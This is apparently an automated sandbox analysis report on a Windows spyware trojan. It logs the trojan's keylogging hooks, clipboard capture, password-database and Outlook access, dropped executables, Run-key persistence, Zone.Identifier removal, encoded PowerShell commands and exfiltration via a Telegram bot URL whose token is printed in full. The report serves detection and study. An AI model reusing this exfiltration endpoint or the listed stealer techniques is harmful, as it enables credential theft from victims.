Source: file.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000003.506380534.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.0000000002782000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0X
Source: file.exe, 00000004.00000002.618527573.0000000002C91000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 0000000F.00000002.574894643.0000000002C22000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000013.00000002.616219501.0000000003471000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: file.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000003.506380534.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.0000000002782000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com/CPS0
Source: kDPmkTm.exe, 00000013.00000002.653315830.0000000006C60000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.microsoft.s
Source: file.exe, 00000004.00000002.618527573.0000000002C91000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 0000000F.00000002.574894643.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 0000000F.00000002.574894643.0000000002C22000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000013.00000002.616219501.0000000003471000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ipify.org
Source: Qasvjoldkyh.exe, 0000000F.00000002.574894643.0000000002C22000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000013.00000002.616219501.0000000003471000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ipify.org/
Source: Qasvjoldkyh.exe, 0000000F.00000002.574894643.0000000002C22000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ipify.org4
Source: file.exe, 00000004.00000002.618527573.0000000002CF6000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000013.00000002.616219501.00000000034D6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: Qasvjoldkyh.exe, 0000000F.00000002.574894643.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000013.00000002.616219501.0000000003471000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/
Source: file.exe, 00000004.00000002.618527573.0000000002CF6000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000013.00000002.616219501.00000000034D6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendDocument
Source: file.exe, 00000004.00000002.618527573.0000000002CF6000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000013.00000002.616219501.00000000034D6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org4
Source: file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.390593122.0000000005710000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://urn.to/r/sds_see
Source: kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.newtonsoft.com/json
Source: kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.newtonsoft.com/jsonschema
Source: file.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000003.506380534.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.0000000002782000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
Source: unknown HTTP traffic detected: POST /bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8db29b545d5b5a8Host: api.telegram.orgContent-Length: 972Expect: 100-continueConnection: Keep-Alive
Source: unknown DNS traffic detected: queries for: api.ipify.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: unknown HTTPS traffic detected: 104.237.62.211:443 -> 192.168.2.4:49697 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49698 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.237.62.211:443 -> 192.168.2.4:49700 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49702 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Installs a global keyboard hook
Source: C:\Users\user\Desktop\file.exe Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\file.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe
Creates a DirectInput object (often for capturing keystrokes)
Source: file.exe, 00000000.00000002.384459373.0000000000E50000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Creates a window with clipboard capturing capabilities
Source: C:\Users\user\Desktop\file.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Window created: window name: CLIPBRDWNDCLASS
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Detected potential crypto function
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_056E4A80 0_2_056E4A80
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_056E2369 0_2_056E2369
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_056E2378 0_2_056E2378
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_056E4A72 0_2_056E4A72
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_056E152F 0_2_056E152F
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_0123C978 4_2_0123C978
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_0123A9B8 4_2_0123A9B8
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01239DA0 4_2_01239DA0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_0123A0E8 4_2_0123A0E8
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_06980870 4_2_06980870
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_069855C0 4_2_069855C0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_0698C8AC 4_2_0698C8AC
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_06C46210 4_2_06C46210
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_06C430A8 4_2_06C430A8
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_06C48E18 4_2_06C48E18
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_06C42370 4_2_06C42370
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_06C4237C 4_2_06C4237C
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_06C43080 4_2_06C43080
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_06C43000 4_2_06C43000
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_06C4CD99 4_2_06C4CD99
Sample file is different than original file name gathered from version info
Source: file.exe, 00000000.00000002.385810798.0000000002D14000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamef7b8a578-bf20-4913-ad1a-1959db4fc78b.exe4 vs file.exe
Source: file.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs file.exe
Source: file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs file.exe
Source: file.exe, 00000000.00000002.388743810.0000000003D59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamef7b8a578-bf20-4913-ad1a-1959db4fc78b.exe4 vs file.exe
Source: file.exe, 00000000.00000003.372912348.00000000055E1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMtzdyotephm.exe" vs file.exe
Source: file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTmonzgkzafmfijmsj.dll" vs file.exe
Source: file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs file.exe
Source: file.exe, 00000000.00000002.384459373.0000000000E50000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs file.exe
Source: file.exe, 00000000.00000002.385810798.0000000002C81000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamef7b8a578-bf20-4913-ad1a-1959db4fc78b.exe4 vs file.exe
Source: file.exe, 00000000.00000002.388743810.0000000003CC6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamef7b8a578-bf20-4913-ad1a-1959db4fc78b.exe4 vs file.exe
Source: file.exe, 00000000.00000000.305756685.0000000000840000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameMtzdyotephm.exe" vs file.exe
Source: file.exe, 00000000.00000002.390593122.0000000005710000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameTmonzgkzafmfijmsj.dll" vs file.exe
Source: file.exe, 00000004.00000002.609344708.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs file.exe
Source: file.exe, 00000004.00000002.618527573.0000000002D29000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameEXPLORER.EXE.MUIj% vs file.exe
Source: file.exe, 00000004.00000002.618527573.0000000002D29000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename vs file.exe
Source: file.exe, 00000004.00000002.618527573.0000000002D29000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: q,\\StringFileInfo\\040904B0\\OriginalFilename vs file.exe
Source: file.exe, 00000004.00000003.389929403.00000000066CF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMtzdyotephm.exe" vs file.exe
Source: file.exe, 00000004.00000002.608064863.0000000000D68000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: OriginalFilenameUNKNOWN_FILET vs file.exe
Source: file.exe Binary or memory string: OriginalFilenameMtzdyotephm.exe" vs file.exe
Source: file.exe ReversingLabs: Detection: 35%
Source: file.exe Virustotal: Detection: 44%
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe Jump to behavior
Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: unknown Process created: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe "C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe "C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe "C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe"
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe "C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe"
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Process created: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe Process created: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA== Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA== Jump to behavior
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Process created: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA== Jump to behavior
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe Process created: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Roaming\Uwztwjweuc Jump to behavior
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\CdFileMgr Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@22/15@8/3
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: Qasvjoldkyh.exe, 0000000F.00000002.574894643.0000000002CBD000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\file.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4136:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5020:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5680:120:WilError_01
Source: C:\Users\user\Desktop\file.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\file.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\file.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\file.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\file.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: file.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: file.exe Static file information: File size 1825280 > 1048576
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: file.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x1bd000
Source: file.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb source: file.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000003.506380534.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.0000000002782000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdbSHA256 source: file.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000003.506380534.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.0000000002782000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmp
Drops PE files
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Jump to dropped file

Boot Survival
barindex
Creates multiple autostart registry keys
Source: C:\Users\user\Desktop\file.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run kDPmkTm Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Qasvjoldkyh Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Qasvjoldkyh Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Qasvjoldkyh Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run kDPmkTm Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run kDPmkTm Jump to behavior

Hooking and other Techniques for Hiding and Protection
barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe File opened: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe:Zone.Identifier read attributes | delete
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
